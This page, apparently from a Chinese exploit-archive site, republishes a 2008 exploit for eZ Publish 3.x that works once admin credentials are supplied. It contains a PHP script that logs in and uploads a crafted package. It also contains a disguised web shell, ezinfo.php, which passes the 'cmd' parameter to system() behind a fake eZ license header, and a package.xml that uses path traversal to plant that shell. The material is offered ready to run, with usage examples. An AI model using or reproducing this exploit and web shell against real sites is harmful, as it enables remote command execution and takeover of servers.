首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req)
来源:s4avrd0w@p0c.ru 作者:s4avrd0w 发布时间:2008-12-12  

// eZPublish_abuse_of_functionality_zero_day.php

--------------------------------------------------------------

<?php

/*
 eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru]
 Versions affected 3.x

 * tested on version 3.9.0, 3.9.5, 3.10.1

 usage:

 # ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server

 The options are required:

 -u Login of the exists admin on eZ Publish
 -p Admin password on eZ Publish
 -s Target eZ Publish admin interface

 example:

 # ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
 [+] Exploit successfully sending
 [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
*/

function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -u=username -p=password -s=EZPublish_server

The options are required:
 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -s Target eZ Publish admin interface

example:

# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
[+] Exploit successfully sending
[+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
";
}

function successfully($server)
{

$server = substr($server,7,strpos($server,"/",7)-7);

print "
[+] Exploit successfully sending
[+] For OS Commanding executing go to: http://$server/ezinfo/about?cmd=<OScommand>
";
}

if ($argc != 4 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
 help_argc($argv[0]);
 exit(0);
}
else
{
 $ARG = array();
 foreach ($argv as $arg) {
  if (strpos($arg, '-') === 0) {
   $key = substr($arg,1,1);
   if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
  }
 }

 if ($ARG[u] && $ARG[p] && $ARG[s])
 {
  if (file_exists("ez_exploit.ezpkg"))
  {

   $post_login_fields = array(
    'Login' => $ARG[u],
    'Password' => $ARG[p],
    'LoginButton' => '1',
    'RedirectURI' => ''
   );

   $headers = array(
       'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
       'Referer' => $ARG[s]
   );

   $res_http = new HttpRequest($ARG[s]."/user/login", HttpRequest::METH_POST);
   $res_http->addPostFields($post_login_fields);
   $res_http->addHeaders($headers);
   try {
        $http_response = $res_http->send();

    if (eregi("message-warning", $http_response->getBody()))
    {
     print "[-] Login failed";
     exit(0);
    }
    else
    {
     $http_headers = $http_response->getHeaders();
     
     if ($http_headers['Set-Cookie'])
     {


      $eZcookie = explode(";",$http_headers['Set-Cookie']);
      $eZadmcookie = explode("=",$eZcookie[0]);

      $cookies = array(
           $eZadmcookie[0] => $eZadmcookie[1]
      );

      $post_fields = array(
       'MAX_FILE_SIZE' => '32000000',
       'UploadPackageButton' => '1'
      );

      $res_http = new HttpRequest($ARG[s]."/package/upload", HttpRequest::METH_POST);
      $res_http->addPostFields($post_fields);
      $res_http->addHeaders($headers);
      $res_http->addCookies($cookies);
      $res_http->addPostFile("PackageBinaryFile","ez_exploit.ezpkg","multipart/form-data");
      try {
           $http_response = $res_http->send();

       if (!eregi("UploadPackageButton", $http_response->getBody()))
       {
        successfully($ARG[s]);
       }
       else
       {
        print "[-] Exploit failed";
       }

      } catch (HttpException $exception) {

       print "[-] Not connected";
       exit(0);

      }

     }
     else
     {
      print "[-] Error get cookie";
     }

    }


   } catch (HttpException $exception) {

    print "[-] Not connected";
    exit(0);

   }


  }
  else
  {
   print "[-] File ez_exploit.ezpkg not found\n";
   print "[-] Exploit failed";
  }
 }
 else
 {
  help_argc($argv[0]);
  exit(0);
 }
}

?>

-------------------------------------------------------------

//ezinfo.php

-------------------------------------------------------------

<?php
print "<pre>";
system($_GET['cmd']);
print "</pre>";

//
// SOFTWARE NAME: eZ publish
// SOFTWARE RELEASE: 3.9.0
// BUILD VERSION: 17785
// COPYRIGHT NOTICE: Copyright (C) 1999-2006 eZ systems AS
// SOFTWARE LICENSE: GNU General Public License v2.0
// NOTICE: >
//   This program is free software; you can redistribute it and/or
//   modify it under the terms of version 2.0  of the GNU General
//   Public License as published by the Free Software Foundation.
//
//   This program is distributed in the hope that it will be useful,
//   but WITHOUT ANY WARRANTY; without even the implied warranty of
//   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//   GNU General Public License for more details.
//
//   You should have received a copy of version 2.0 of the GNU General
//   Public License along with this program; if not, write to the Free
//   Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
//   MA 02110-1301, USA.
//
//

class ezdhtmlInfo
{
    function info()
    {
        return array( 'Name' => "eZ Online Editor",
                      'Version' => "4.2",
                      'Copyright' => "Copyright (C) 1999-2006 eZ systems AS",
                      'License' => "GNU General Public License v2.0",
                    );
    }
}
?>

---------------------------------------------------------------------------------

//package.xml

---------------------------------------------------------------------------------

<?xml version="1.0" encoding="UTF-8"?>
<package version="3.8.0"
   development="false"
   is_active="true"
   install_type="import">
  <name>../../../../extension/ezdhtml</name>
  <summary>Website Interface</summary>
  <description>Website Interface is a web based CMS solution based on eZ Publish. It contains templates and settings that meets the most common requirements for content management systems.</description>
  <vendor>eZ systems</vendor>
  <type value="site" />
  <ezpublish>
 <version>3.8.0</version>
 <named-version>3.8</named-version>
  </ezpublish>
  <maintainers>
 <maintainer>
   <name>Administrator User</name>
   <email>nospam@ez.no</email>
   <role>lead</role>
 </maintainer>
  </maintainers>
  <packaging>
 <timestamp>1153313252</timestamp>
 <host>packages.jkn.ez.no</host>
  </packaging>
  <documents>
 <document mime-type="text/plain"
     name="LICENCE" />
  </documents>
  <changelog>
 <entry person="Administrator User"
     email="nospam@ez.no"
     release="1">
   <change>Creation of package.</change>
 </entry>
  </changelog>
 
</package>

------------------------------------------------------------------------------------------------


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Exploits Multiple XSRF in DD-W
·Internet Explorer 8.0 Beta 2 A
·Internet Explorer 7.0 XML 0da
·MS Internet Explorer XML Parsi
·MS Visual Basic ActiveX Contro
·eZ Publish < 3.9.5/3.10.1/4.0.
·Wysi Wiki Wyg 1.0 Remote Passw
·Linux Kernel <= 2.6.27.8 ATMSV
·MS Internet Explorer XML Parsi
·ProSysInfo TFTP Server TFTPDWI
·EasyMail ActiveX (emmailstore.
·WebPhotoPro exploit written in
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved